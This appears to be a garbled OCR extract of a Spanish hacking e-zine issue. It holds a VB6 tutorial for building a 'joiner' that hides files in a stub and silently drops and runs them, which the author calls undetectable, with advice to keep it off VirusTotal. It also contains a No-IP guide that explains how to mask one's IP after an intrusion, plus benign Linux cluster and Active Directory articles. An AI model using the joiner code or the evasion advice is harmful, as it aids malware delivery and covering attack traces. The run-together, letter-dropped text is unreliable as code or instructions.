Const DI_MASK = &H1Const DI_IMAGE = &H2Const DI_NORMAL = DI_MASK Or DI_IMAGEPrivate Declare Function ExtractAssociatedIcon Lib “shell32.dll” Alias “ExtractAs-sociatedIconA” (ByVal hInst As Long, ByVal lpIconPath As String, lpiIcon As Long)As LongPrivate Declare Function DrawIconEx Lib “user32” (ByVal hdc As Long, ByValxLet As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal cxWidth AsLong, ByVal cyWidth As Long, ByVal istepIAniCur As Long, ByVal hbrFlickerFree-Draw As Long, ByVal diFlags As Long) As LongPrivate Declare Function DestroyIcon Lib “user32” (ByVal hIcon As Long) As LongDim CuentaIcon As Integer 

Function Icono(Ruta As String)Dim Icon As Long

 Form1.Picture1.BackColor = vbWhite

 Icon = ExtractAssociatedIcon(App.hInstance, Ruta, 2)DrawIconEx Form1.Picture1.hdc, 1, 0, Icon, 16, 16, 0, 0, DI_NORMALDestroyIcon IconSavePicture Form1.Picture1.Image, Environ(“HOMEDRIVE”) & “\temp.bmp”CuentaIcon = CuentaIcon + 1

 Form1.IL.ListImages.Add CuentaIcon, , LoadPicture(Environ(“HOMEDRIVE”) & 

“\Temp.bmp”) 

Kill Environ(“HOMEDRIVE”) & “\Temp.bmp”Icono = CuentaIcon

End Function

Así que vamos a ir introduciendo los datos pertinentes con el siguientecódigo:

Private Sub Juntar_Click()Ruta = App.Path & “\stub.exe” ‘La ruta del stubFirma = “[**-_-**]”SubFirma = “^^_~~_^^”

FileCopy App.Path & “\stub.dll”, App.Path & “\Stub.exe” ‘Copiamos el stub de ladllFor n = 1 To Lv.ListItems.Count ‘Vamos abriendo todos los archivospertenecientes a la lista

‘Leemos el archivoOpen Lv.ListItems.Item(n).SubItems(1) For Binary As #1

Dim Archivo As StringArchivo = Space(LOF(1))Get #1, , Archivo

Close #1 

Open Ruta For Binary As #1 ‘Metemos los datos necesarios en el stubSeek (1), LOF(1) + 1Put #1, , FirmaPut #1, , Archivo & SubFirma ‘Metemos el archivo

Private Function Ruta() As String‘Función para obtener nuestra propiaruta

Dim ModuleName As String, File-Name As String, hInst As Long

ModuleName = String$(128,

Chr$(0))hInst = GetWindowWord(Me.hwnd,

GWW_HINSTANCE)ModuleName = Let$(ModuleName,

GetModuleFileName(hInst, Module-Name, Len(ModuleName)))

Ruta = ModuleNameEnd Function

Listado 1

ESTRUCTURA DEL STUB:- Stub- Firma “[**-_-**]”- Archivo- SubFirma “^^_~~_^^”- Nombre del ejecutable- SubFirma “^^_~~_^^”- Ruta de estración

Put #1, , Lv.ListItems.Item(n).Text & SubFirma

Put #1, , Lv.ListItems.Item(n).SubItems(3) & SubFirma ‘La ruta

Put #1, , Lv.ListItems.Item(n).SubItems(4) ‘Si se ejecuta o no

Close #1Next n

End Sub

Programando un Joiner en VB 6.0

www.ezine.insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 17/41

Private Sub Form_Load()Dim Archivo As String ‘Variable que contendrá el archivoDim Nombre As String ‘Variable que contendrá el nombre del archivoDim RutaExt As String ‘Variable que contendrá la ruta de extraccionDim Ejecutar As String ‘Variable para saber si se ejecutará o no el archivoFirma = “[**-_-**]”SubFirma = “^^_~~_^^”

Open Ruta For Binary As #1 ‘Nos autoleemosDim Todo As StringTodo = Space(LOF(1))Get #1, , Todo

Close #1

Dim Partes As Variant, SubPartes As Variant Partes = Split(Todo, Firma)

For n = 1 To UBound(Partes)SubPartes = Split(Partes(n), SubFirma)

 For i = 0 To UBound(SubPartes)

Select Case i

Case 0 ‘El archivoArchivo = SubPartes(i)

Case 1 ‘El nombre del archivoNombre = SubPartes(i)

Case 2 ‘La rutaSelect Case SubPartes(i)Case “Windows”

RutaExt = Environ(“WINDIR”)Case “System32”

RutaExt = Environ(“WINDIR”) & “\system32”Case “Disco local”

RutaExt = Environ(“HOMEDRIVE”)Case Else

RutaExt = SubPartes(i)End Select 

Case 3 ‘Ejecutar Si/NoEjecutar = SubPartes(i)

End Select Next iOpen RutaExt & “\” & Nombre For Binary As #1 ‘Extraemos el archivo

Put #1, , ArchivoClose #1I Ejecutar = “Si” Then ShellExecute Me.hwnd, vbNullString, RutaExt & “\” & 

Nombre, vbNullString, Environ(“HOMEDRIVE”), SW_SHOWNORMALNext n

End ‘FinalizamosEnd Sub

Y ya esta. Compilad el proyecto“Joiner” como Joiner.exe, el proyecto“Stub” como Stub.dll, colocadlos enla misma carpeta y probadlos por vosotros mismos.

ConclusionesBueno pues ya tenemos nuestro pro-pio joiner creado y no ha sido nadamuy diícil ¿verdad?.

Además el stub solo pesa 20 KB ysiempre le podéis pasar el UPX, perolo mejor de todo es esto (que consteque me está doliendo subir el archi-vo a virustotal, pero así voy a ahorrar que lo suba todo el mundo y pase aser detectado…).

Pues ya lo veis, no hemos tardado niuna hora y tenemos nuestro propiojoiner indetectable.

Si queréis que siga así no hagáiscomo yo y no lo subáis a virustotal.

Despedida

Aquí termina mi papel. Espero quehayáis disrutado con este manuatanto como he disrutado yo es-cribiéndolo. Que hayáis comprendi-do que es un joiner, y lo más impor-tante como unciona el mismo y queos animéis a hacer uno propio conmás opciones que el mío, como unsistema de compresión por ejemplou opciones para cambiarle el iconoal stub, pero eso ya os lo dejo a vo-sotros ;)

Autor-E0N

Programando un Joiner en VB 6.0

www.ezine.insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 18/41

Cluster Alta Disponibilidad en Linux

IntroducciónEn este articulo aprenderemos aimplementar un Cluster de Alta di-sponibilidad (AD) .

Material necesario:

-2 máquinas con Linux-El paquete Heardbeat -Un Sistema de fcheros con Jour-

naling-Una Red-Puerto serie

¿Que es un Cluster y para que

me sirve?

Un cluster , consiste en un grupo denodos conectados entre si que inter-actúan como una sola máquina (“En

caso que un nodo dejase de uncio-nar tomaría el control el segundonodo”) , reduciendo así considerable-mente la tolerancia a allos y caídasde servicio.Un cluster podría servir perecta-mente en el caso de un problema deHardware nuestros clientes tendríanigualmente servicio ya que uno delos nodos tomaría el control comomaquina primaria.

¿Qué es Heardbeat?

Heardbeat es un paquete de sot-ware creado por LINUX-HA , un-ciona similar al System V o init peroen vez de una sola máquina pasaríaa ejecutar los servicios en los nodos

 , basándose en que no le llegan re-spuestas estas se hacen por mediode ping y por pulsaciones del cableserie.

Que es STONITH?STONITH son la Siglas de “Shoot TheOther Node In The Head” (“ Pégaleun Tiro en la Cabeza al otro Nodo”).Es una técnica usada por heardbeat que se asegura de que un servidor supuestamente muerto no intereracon el uncionamiento del cluster ,en caso de no implementarse bienesta técnica , podría dar lugar a que

el cluster no uncione.A groso modo STONITH consisteen que el servidor secundario notaque el primario no unciona, y estele haría un DDOS al primario paraasegurarse de que ha sido un alsopositivo y tomaría el nodo secundar-io el control.

Preparando el Hardware

Existen 3 cosas especícas del cluster que hay que conectar , los discos, lasNICs de interconexión, el cable se-rial de interconexión y los cables decontrol de los UPS.

•Primero instalaremos los discos , pero no crearemos aun ningúnsistema de cheros.•Instalaremos las NICs y las congu-raremos con ips privadas de la misma

subred en los rangos 192.168.0.0/16o el rango 10.0.0/8.•A continuación nos haremos con uncable Serial para la comunicación PCa PC . Nos aseguraremos de que elcable incluya módems null y que in-cluya cables CTS Y RTS.•Conectamos cada ordenador a suUPS.

Instalación del SotwarePara nuestro cluster necesitaremosvarios paquetes de sotware.

heardbeat-1.0.3 , heardbeat-pils-1.0.3, heardbeat-stonith-1.0.3

Cada uno de ellos se encuentra enlos repositorios de las distribucioneso se incluye como paquete en los

cds de instalación de esta (Cuandoinstale suse 9.3 me pareció verlos enla instalación) si no los encontráis po-déis mirar en http://linux-ha.org.

Los paquetes los instalaremos usan-do nuestro administrador de paque-tes avoritos ya sea apt-get , yast urpmi , emerge , etc.

Por ultimo nos queda instalar eservicio que queramos dar ya sea

samba,apache postx , etc.

Confgurando DRBD

DRBD se congura en el chero /etc/drbd.con.

resource drbd0 {protocol=C

sckcmd=/bin/true

disk {disk-size=80418208do-panic }net {sync-rate=8M # bytes/sec timeout=60connect-int=10

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 19/41

Nota: Para calcular el tamaño deldisco usaremos blockdev-getsize ydividiremos el resultado por dos siambas partes dan resultado dier-ente eligiremos el más grande.

Creando el Sistema de Ficheros

A continuación crearemos el sistemade cheros para Zeus ( Servidor Pri-mario) es importante usar un sistema

de cheros con Journaling como xs ,Reisers, ext3 , js.

Crearemos dos particiones del mis-mo tamaño en el dispositivo /dev/nb0 los dos servidores y con Reisersya que se considera más seguro.

Instrucciones a ejecutar en Zeus

Le respondemos “yes” para que nosponga a Zeus como primario.Ahora creamos el sistema de cherosy lo montamos.

Por último si usamos una conexiónEthernet de 1gb para la sincroni-zación, cambiaremos los parámetroslos parámetros de esta para que nosuncione en modo ullduplex ver Ac-tivando Fullduplex en targetas eth-ernet.

Confgurando Heardbeat

Heardbeat tiene tres cheros de con-guración.

1. ha.c Congura inormaciónbásica del cluster 2. haresources.c Congura losgrupos de recursos tipo init 3. authkeys Congura la Au-

tenticación de red

Se pueden encontrar ejemplos deestos cheros en /usr/share/doc/pakages/heardbeat y se documen-tan en el chero “Getting Started”de Heardbeat 

ha.c le aporta a heardbeat la inor-mación de la conguración básica.Congura los nodos, pulsaciones se-

rial , la manera de registrar los logsintervalo de tiempo muerto y pulsa-ciones.

Ejemplo de nustro ha.c 

Las pulsciónes se envian por eth0 eth1 y serial /dev/ttyS0 este cheroes idéntico para todos los nodos

Fichero /etc/ha.d/haresources

Este chero crea un grupo de recur-sos que en teoría pertenecen a Zeus

asociados a una ip virtual 10.10.10.20y los recursos a servir:

• NFS (Network File System)• Samba (compartición archi-vos Windows)• Dhcp (asignación dinámicade Ips)• Postx (Servidor de Correoelectrónico)

Zeus 10.10.10.20 datadisk::drbd0 ns-lock nsserver smb dhcpd postx

Para claricar donde están coloca-dos los scripts diré que Ipaddr y dat-adisk están en /etc/ha.d/resource.d yel resto de servicios tipicos en /etc/init.d/

HeardBeat se las apaña de maravillaadministrando la mayoría de servi-cios que vienen en los V System init

comúnmente llamados los scripts dearranque, sin embargo una de lascondiciones para que Heardbeat ad-ministre correctamente los Scripts esque tienen de tener el mismo nom-bre en todos los Nodos , por lo tantorecomiendo usar una distribuciónidéntica en las dos maquinas assimplicaremos la conguración y emantenimiento.

ping-int=10}on Zeus { # Zeus es el nombredel Servidor Principaldevice=/dev/nb0disk=/dev/hda1address=192.168.1.1port=7789}on SolarUX { #SolarUX es elnombre del servidor Segundariodevice=/dev/nb0disk=/dev/hda1address=192.168.1.2port=7789}}

Cluster alta disponibilidad en Linux

www.ezine-insecurity.com

Root@Zeus:~#/etc/init.d/drbd

start 

Root@Zeus:~# mks -t reisers/dev/nb0 datadisk /dev/nb0 start 

logacility local7 # serviciode syslogkeepalive 1 #Intervalo pulsaciónwarntime 2 #Pulsación Tardía

deadtime 10 # Tiempo controlFallosnice_ailback onnode Zeus SolarUXping 10.10.10.254 # Dirección delRouter bcast eth0 eth1 #Broadcast In-teraces HeardBeat 

serial /dev/ttyS0 #Enlace SerialHeardBeat respawn /usr/lib/heardbeat/ipailstonith_host Zeus apcsmart So-larUX /dev/ttyS1stonith_host SolarUX apcsmart

Zeus /dev/ttyS1

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 20/41

Fichero /etc/ha.d/authkeys

Authkeys es el chero de congu-ración mas sencillo de todos. Con-tiene el método de autenticaciónbasado en (sha1) con la clave que seusara para rmar los paquetes . Estechero tiene que ser idéntico en to-dos los servidores y no debe tener ningún usuario acceso de lectura aexcepción de root:

auth 11 sha1 RandomPasswordc970c94eb

Coniguración de los Servicios

Tenemos de deshabilitar los serviciospara que no sean controlados por init si no mor HeardBeat.Esto lo conseguiremos con el si-guiente comando:

Notese que deberíamos cambiar losservicios marcados en azul por losque tenemos congurados en

/etc/ha.d/haresources para servir.

Conigurando /etc/stab

Tenemos de tener especial cuidadoen que la partición /home no semonte automáticamente desde /etc/stab si existe ya una entrada para /home en dicho chero la eliminamosy creamos esta:

/dev/nb0 /home reisers noauto 0 0Nota: si home ya esta montado lodesmontamos con umount /home

Confguración del Fichero /etc/hosts

Si no tenemos un servidor DNS cor-riendo en nuestra red tendremos deusar nuestro archivo /etc/hosts que-dando de esta manera:

Montando todo el Cotarro

Ahora es el momento de congu-rar el servidor secundario para quemonte /home desde NFS añadiendolo siguiente en /etc/stab.

Cluster:/home /home ns \ de-aults 0 0

Una vez la partición NFS mon-tada creamos el directorio /home/HA.cong y creamos la siguienteestructura de directorios:

Después de montar la estruc-tura de directorios tendríamosque crear enlaces simbólicos por ejemplo:

Ahora desmontamos /home de lasiguiente orma:

También podemos congurarsamba para que escuche en lainterace del cluster modicandodentro de la directiva [ global ] de/etc/samba/smb.c 

interfaces = 127.0.0.1/810.10.10.10.20/24

Comprobando si todo Funciona

DRBD

Arrancamos drbd tanto en Zeuscomo en SolarUX con:

Una vez iniciado comprobaremosen Zeus si ha arrancado con:

Veríamos algo así:

0: cs:SyncingAll st:Primary/Sec-ondary

Esto nos indica que ha sido todoarrancado correctamente y queuna Sincronización Completa estáen marcha . Esta sincronizacióntarda un poco y se puede ver eprogreso en /proc/drbd.

Cluster alta disponibilidad en Linux

www.ezine-insecurity.com

Root@Zeus:~# chkcong -delnslock nsserver smb dhcpd post-x

10.10.10.20 Cluster # IP virtualcluster 192.168.1.1 Zeus #Servidor Primario192.168.1.2 SolarUX # Servidor Segundario (Nodo)

/etc postx/samba/exportsdhcpd.con 

/var lib/

dhcpdsambans

spool/postx/mail/

ln -s /home/HA.cong/etc/samba/smb.c /etc/samba/smb.c 

Root@Zeus:~# datadisk /dev/nb0 stop

Root@Zeus:~# /etc/init.d/drbdstop

Root@Zeus:~# /etc/init.d/drbd start 

Root@Zeus:~# cat /proc/drbd

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 21/41

HEARDBEAT

/home tiene que estar montado en

Cluster y todos los servicios tendriande estar corriendo

Delegando Funciones

Ahora heardbeat tiene de ser capazde retransmitir todos los trabajos aSolarUX lo haremos con:

Ahora hacemos los pasos de arribaHEARDBEAT en SolarUX y com-probamos si todo unciona correcta-mente si es así delegamos uncionesa Zeus:

Comprobamos en Zeus y si es así ya

casi está.

 Administrador Contento

Desconectamos el cable de red aZeus y en estos momentos aproxi-madamente unos 10 Sec SolarUXtendría de responder a la ip Virtual10.10.10.20 y darnos Servicio.

Despedida

Espero que el artículos os hayagustado y que hayáis aprendido quees el Cluster.

Autor- _TuXeD_ 

Cluster alta disponibilidad en Linux

www.ezine-insecurity.com

Root@Zeus:~# /etc/init.d/heardbeat start Root@Zeus:~# icong |grep10.10.10.20

Root@Zeus:~# /etc/init.d/nslock statusRoot@Zeus:~# /etc/init.d/smbstatusRoot@Zeus:~# /etc/init.d/dhcpdstatusRoot@Zeus:~# /etc/init.d/postxstatus

Root@Zeus:~# /usr/sbin/heardbeat/hb_standby

Root@SolarUx:~# /usr/sbin/heardbeat/hb_standby

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 22/41

Ocultación de IP por nombre de dominio bajo Linux

EmpezamosEn este artículo enseñaré como crear una cuenta no-ip gratuita, congu-rarla, y hacer uncionar el cliente,de esto hay muchos manuales muybuenos, ahora lo divertido e inte-resante de este articulo es que loharemos bajo Linux. Esto tiene unadoble intención la primera es decongurar nuestro cliente no-ip para

orecer algún servicio de FTP connuestros amigos o conocidos, algunapág. web, algún servicio que requi-era que tengamos una ip ja, ya quela mayoría de nosotros tenemos ipdinámica, que cambia cada ves quese resetea la conexión, así siempretendríamos el mismo nombre de do-minio independiente de la ip dinámi-ca. Y la segunda, para ocultarnos.

Lo que hace esto del DNS dinámico

es que cada cierto tiempo actualizatu ip a tu nombre de dominio. Buenoahora lo que tenemos que hacer esregistrarnos en www.no-ip.com en lapág. principal elegimos No-IP Free(a menos que tengamos dinero parapagar el No-IP Plus ).

Ahora damos clic en SING UP

NOW.

Ahora como cualquier registración,ponemos nuestros datos. Como espara ocultarnos, no es muy buenaidea poner nuestros datos person-ales reales.

Después te llegará un correo conlas instrucciones para dar de alta tucuenta.Una vez conrmada nuestra cuentapues ingresamos nuestro correo ycontraseña, para poder proceder aelegir el dominio que queramos, pul-samos -Add- (en la derecha) y ahoraen -Host Name- podemos poner elque queramos, abajo están las op-

ciones de dominio como son mytp.org, redirecme.net etc. Es solo paradescribir el servicio, podemos elegir el que más nos guste.

En -Host Type- es para elegir el tipode DNS que queremos, como solova a ser para ocultarnos o para redi-rigir nuestra IP elegimos el tipo A.

Si quisiéramos un re direccionamiento al puerto 80 para un servidor webtendriamos que elegir -Port 80 Redi-rect- depende de para que lo quera-mos. -IP Address- se autocompleta(Debemos poner nuestra IP externanada de proxys).

Pulsamos sobre -Create Host- y listoen unos 5 minutos tendremos listonuestro nombre de dominio que enmi caso es penguin-power.redirect-

me.net 

Pues ya han pasado los 5 minutos va-mos a ver si unciona. Si unciona, ecomando ping debería devolvermemi IP externa, pues vamos a ver si escierto, abrimos la shell y ejecutamosel comando:

Ahora debemos descargar el clientepara no-ip, este hará el trabajo de ac-tualizar nuestra ip con el nombre dedominio que elijamos, aquí es dondese pone interesante, porque elegire-mos como O.S. a Linux.

$ ping penguin-power.redirectme.net 

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 23/41

Ahora nos pide el email y pass conque nos registramos, ahora ten-dremos que congurar el servicio,lo primero es el intervalo con el quenuestro cliente actualizara nuestra ipsi es que ha cambiado, por deault trae 30.

La conguración se ha creado exito-samente ahora para ejecutar el pro-grama:

En la carpeta binaries.

Para obtener inormación sobre elestado del cliente ejecutamos:

Apunta el numerito después de Proc-ces, en mi caso es el 10858.Cada 30 minutos de actualizara la ip,suena razonable, o puedes poner elintervalo que quieras.

Ahora nos dice que si después de ac-tualizar la IP deseamos correr algúnprograma, en mi caso pues no, mar-camos N.

Pues listo ya tenemos nuestro clientede No-IP uncionando, ahora supon-go que queremos que se ejecuteal iniciar el sistema, bueno primero

debemos moverlo a su lugar, diga-mos a /usr/local/bin ejecutamos

Miramos que todo va bien:

Nos dirá que no encuentra la con-guración en un momento lo solu-cionamos, ahora para solucionar estoprimero tenemos que terminar eproceso con la instrucción.

Procces el numerito que salía con eopción -S.

Nos descargaremos el archivo, den-tro tiene un binario y código uentemás unos scripts, el archivo que des-cargas se llama noip-duc-linux.tar.gz, lo descomprimimos y dentro hayuna carpeta llamada binaries dondese encuentra el binario, es buenaidea darle una leída al LEEME.PRIM-ERO, para saber que estamos haci-endo. Ahora, para que uncione elbinario debemos tener instalado ellegendario GCC y la libreria libc6 sino lo tenemos, debemos instalarloejecutando: (para distros con APT oAptitude)

#sudo apt-get install gcc

#sudo apt-get install libc6

#sudo apt-get install libc6-dev

Ahora teniendo congurado elsistema abrimos la shell y nos move-mos hasta la carpeta binaries y comoroot ejecutamos:

Y nos saldrá un mensaje como este:

Dice que no se pudo crear el archi-vo de conguracion /urs/local/etc/noip2-Linux

Para resolver esto, en el archivo

LEEME.PRIMERO esta la solución,ejecutamos en la carpeta binaries:

NO-IP en Linux

www.ezine-insecurity.com

$ sudo ./noip2-Linux

$ sudo ./noip-Linux -C

$ sudo ./noip2-Linux

$ sudo ./noip2-Linux -S

$ sudo mv noip2-Linux /usr/local/bin/

$ /usr/local/bin/noip2-Linux -S

$ sudo /usr/local/bin/noip2-Linux -K procces

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 24/41

También puedes saber cual esnúmero de proceso con el moni-tor de sistema esta en Sistema->Administración->Monitor DeSistema ahi en la pestaña ver elije-Ver Todos Los Proceso-.

Vemos que el proceso de No-IP es el12226 en mi caso, en el tuyo segura-mente será otro.Ahora podemos terminar el procesodesde el monitor de sistema o desdela shell, ejecutamos la instrucción:

El proceso ha terminado.

Bien, la conguración que habíamoscreado esta en /usr/local/etc/no-ip2.con Le indicamos al No-IP que use esaconguración con:

Y vemos que todo valla bien eje-cutando:

Y si todo va bien nos saldrá unmensaje parecido a este:

Esto indica el estado del cliente, ve-mos que esta bien y uncionando.

Para que es ejecute al iniciar elsistema basta con agregarlo a losprogramas de inicio en mi caso es enSistema->Preferencias->Seciones->NuevoAntes de esto debes cambar lospermisos sobre el cliente no-ip paraque pueda ser ejecutado al inicio del

sistema con tu cuenta de usuario,para darle los permisos ejecutamos:

También puedes iniciar a nautilus enmodo root ($ sudo nautilus) y nave-gar hasta el directorio del cliente,seleccionarlo, clic derecho, propie-dades, y ahí cambiar los permisos, en

especial el de ejecución,. En nombrepues el que queramos por ejemploCliente No-IP.

Para mas inormación sobre las posi-bilidades de NO-IP pues ejecuta:

Es bastante interesante, trae mas op-ciones que las mostradas aquí, pero

eso ya te corresponde estudiarlas.Cuando empecé a leer sobre estetema, pues decía esto no tiene sen-tido porque si entro a algunamáquina pues se quedaría graba-do el algún log mi nombre de do-minio y el administrador con unsimple ping podría saber mi IP yse acabo. Y como hemos podidover pues no es así.

También Tendré la ventaja de podermontar servicios en mi pc sin tenerque pagar por una IP ja pero no es-toy oculto.

De tantos sitios que orecen este ser-vicio porque se elige NO-IP, puespor la característica de que deja quetu mismo actualices manualmentetu ip y porque es de los pocos queorecen sotware para Linux. Ahoradespués de hacer una intrusión, de-bes cambiar tu ip manualmente, va-mos de nuevo a www.no-ip.com.

Nos logeamos y pulsamos a la dere-cha sobre -MANAGE- y ahí nossaldrá al opción de modicar la ip, la

modicamos y ponemos una cticiacomo por ejemplo 127.0.0.1 o cual-quier otra como la 1.1.1.1.

Así cuando el administrador quierahacer un ping a tu nombre de do-minio se encontrara con una ip alsa

¿Bastante bueno no?

Ahora debemos recordar que si crea-mos un nombre de dominio parahacer una intrusión pues ese nom-bre de dominio no debemos incluirloen el cliente de NO-IP, para que nolo actualice automáticamente, y esedominio ya no lo volveremos a uti-lizar por lógica.

NO-IP en Linux

www.ezine-insecurity.com

$ sudo /usr/local/bin/noip2-Linux -K 12226

$ sudo /usr/local/bin/noip2-Linux -c /usr/local/etc/no-ip2.con 

$ sudo /usr/local/bin/noip2-Linux -S

$ chmod 777 /usr/local/bin/noip2-Linux

$ sudo /usr/local/bin/noip2-Linux

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 25/41

Yo actualice manualmente mi IP a la1.1.1.1, hagamos un ping para ver quepasa.

Y seguro te estarás preguntando, ydonde demonios elijo si quiero quese actualice o no, bueno cuandotienes más de 1 nombre de dominioal ejecutar:

Se nos dice que tenemos más de 1nombre de dominio y se nos pre-gunta cual queremos que se actual-ice automáticamente.

Bien ahora ya podemos alojar servi-

cion en nuesto pc bajo nuestro muyquerido Linux, sin mucho esuerzo,y sin pagar al ISP por una IP estática.También ya tenemos como hacer al-gunos escaneos ocultandonos bajoun nombre de dominio, la vetaja deesto es que este método no relentizala conexién.

Eso es todo. Hsta la próxima.

Autor-POWERED BY LINUX

NO-IP en Linux

www.ezine-insecurity.com

$ sudo /usr/local/bin/noip2-Linux -C

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 26/41

Confguración e instalación de directorio activo(Windows 2003 server)

Antes de proceder a la instalación deun servidor debemos tener dos con-ceptos claros, saber la dierencia en-tre redes con servidor que es la quevamos a instalar y la dierencia entreredes entre iguales.Por lo tanto encontramos estos dostipos de LAN dierentes:

-Redes con servidor: La caracterís-tica principal es que en este tipo deredes tenemos al menos una equipo

llamado servidor donde se van aencontrar todos los recursos a com-partir, con esto me reero tanto car-petas, como impresoras, grabadoras,lectores, etc... . A parte del servidor encontramos dierentes equiposllamados clientes o estaciones detrabajo, que solo tendrán permisossobre los recursos locales o del servi-dor, importante no de las otras esta-ciones de trabajo. Dependiendo del

tipo de sistema operativo instaladoen el servidor encontramos:

Servidor dedicado: Utilizado única-mente para gestionar los recursos dela red.

Servidor no dedicado: Que ademásde llevar la gestión de la red tam-bién puede uncionar como estaciónde trabajo.

-Redes entre iguales: En este tipocada máquina puede compartir susrecursos con todas las demás máqui-nas, de orma que actúan comoclientes y servidores a la vez, estoen Windows se le denomina comoun grupo de trabajo, donde cadamaquina se integran en ese grupoy tiene privilegios sobre todos losrecursos compartidos de las de masmáquinas.

Esto es lo que se vemos en Windows,ya que se puede burlar, escaneandotoda la red y podemos introducirnosen los documentos compartidos detoda la red, aunque esa equipo noeste dentro del grupo de trabajo,esto todo a través de NetBIOS.

Teniendo claro estos dos conceptospodemos proceder a la explicaciónde la conguración de active direc-tory (directorio activo).

Dominios en Windows

2000/2003 Server 

Una basada en Windows 2000/2003server utiliza un servicio de direc-torio para almacenar toda la inor-mación relativa a la administraciónseguridad de la red.

En este tipo de servidores existe elconcepto de dominio, existiendo así el servicio de directorios llamado ac-tive diretory (directorio activo) dondese almacena toda la inormación dela red, integrando así todos los ser-vicios de la red, como la gestión denombres de dominio DNS así comoel protocolo encargado de la asig-nación de direcciones dinámicas dela red, el protocolo DHCP.

Este conjunto de dominio es muyidéntico al de NT, es un conjuntode servidores, estaciones y otrosrecursos de la red que com-parten el mismo modelo de se-guridad, incluyendo en Windows2000/2003 server la integracióndel DNS, de esta orman éstos senombran siguiendo la misma no-menclatura.

Las unidades organizativas, sepueden crear otros usuarios, gru-pos y otros recursos, así este do-minio puede establecer relacionesentre ellos, ormando una estructurajerárquica llamada árbol de dominioUn ejemplo de la estructura arbores-cente:

Un árbol de dominio es un conjuntode dominios que están conectadosmediante unas relaciones de con-anza por as decirlo, y así mismo,

cuando varios árboles se conectanmediante relaciones, se orma unbosque.

Instalando ACTIVE DIRECTORY

Comenzamos instalando active di-rectory siguiendo el patrón de insta-lación por deecto, a este podemosllegar desde herramientas adminis-trativas y ejecutamos conguracióndel servidor o de una orma masreducida iniciamos ejecutar e intro-ducimos el comando Dcpromo.exey así ejecutamos la unción de insta-lación del controlador.

Una vez accedemos a la congu-ración de active directory nos encon-tramos con el asistente:

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 27/41

Como vemos tenemos dos opcionesa señalar, el tipo de controlador de

dominios:Controlador de dominio para unnuevo dominio: de esta orma in-stalamos active directory en el servi-dor y se congura como el primer controlador de dominio.Controlador de dominio adicionalpara un dominio: Si seleccionamosesta opción elimina todas las cuentaslocales en el servidor y se elimina to-das las claves de cirado.

Si vamos a instalar e congurar nue-

stro primero directorio activo, selec-cionamos controlador de dominiopara un nuevo dominio, así se crearaun nuevo dominio y será registradoel DNS.

Crear árbol o dominio secundario.En este punto es donde elegiremosel nombre de dominio, podemoselegir entre:

Crear un nuevo ár-bol de dominios: se-leccionamos este paracrear un nuevo árbolde dominios y así mis-mo alojar el primer dominio en el árbol,esta opción es la quevamos a seleccionar para congurar por primera vez nuestroactive directory.Crear un nuevo do-minio secundario enun árbol de domin-ios existent e: selec-

cionamos este para denominar ycongurar un hijo por así decirlo del

dominio ya existente en el árbol.

Nombre de nuevo Dominio: Aquí introduciremos el nombre de DNSpara identicar la red, este es elnombre en el cual vamos introducir todos nuestros equipos a este servi-dor para que se puedan introducir en el dominio creado en el servidor,tampoco tiene que estar registradoen el Centro de inormación de re-des de Internet (InterNIC, Internet 

Network inormación), la orga-nización responsable de mantener elregistro de los nombres DNS en losdominios de nivel superior com, net,org…, eso si tenemos la posibilidadde utilizar un dominio no registrado,pero si salimos a internet e utiliza-mos protocolos estándar como httpo tp, pueden haber conusiones ycolisiones si ya existiera ese dominioen la red de redes.

Nombre de dominio NetBIOS: aparte del nombre DNS introducidoen el paso anterior, también nos so-licita el nombre NetBIOS, esto sedebe a que varios sistemas no sopo-rtan active directory, y para accedera los sistemas compartidos se lo real-

izamos a través de NetBIOS, cuandohablamos de este nombre nos reeri-mos al nombre del equipo que le vadenominar en la red.

Una vez introducidos todos los nom-bres de dominio, a continuacióndebemos especicar la ubicaciónde la base de datos, esta contendrálos objetos Active Directory y suspropiedades, esta conguración ladejamos por deecto, así mismo laubicación de esta será en la carpeta%SystemRoot%\Ntds del volumendel sistema.

Confguración e instalación de directorio activo

www.ezine-insecurity.com

8/15/2019 eZine InSecurity N3

http://slidepdf.com/reader/full/ezine-insecurity-n3 28/41

A continuación debemos especicar el volumen del sistema compartido,este crea un recurso compartido enla carpeta %SystemRoot%\Sysvol, esimportante que el volumen utilizadoen disco sea NTFS 5, si no lo uerahabría que transormarlo para sucorrecto uncionamiento, e leído yse recomienda ubicarlo en otro discoduro distinto al del sistema operativopor si este allara.

A continuación debemos congurar el DNS, este paso lo podemos pasar ya que luego vamos a congurar elDNS al completo, esto lo hace au-tomáticamente la conguración deactive directory.Finalización de la instalación de Ac-tive Directory: La nalización de lainstalación de controladores se ac-

tive directory se realiza cuando elservicio DNS proporciona el serviciolocalizador para el nuevo dominio.

CONFIGURACION DE DNS

Esta conguración la realizaremos através de la utilidad DNS accesible

desde el menú Herramientas admin-istrativas.Si desplegamos y abrimos todaslas carpetas se puede observar laestructura jerárquica en que esta or-ganizados los nombres de dominio.Puede verse el nombre del equipoque hace de servidor DNS, la raíz delárbol (nombrada con un punto “.”)y el dominio de la organización, do-minio.local.

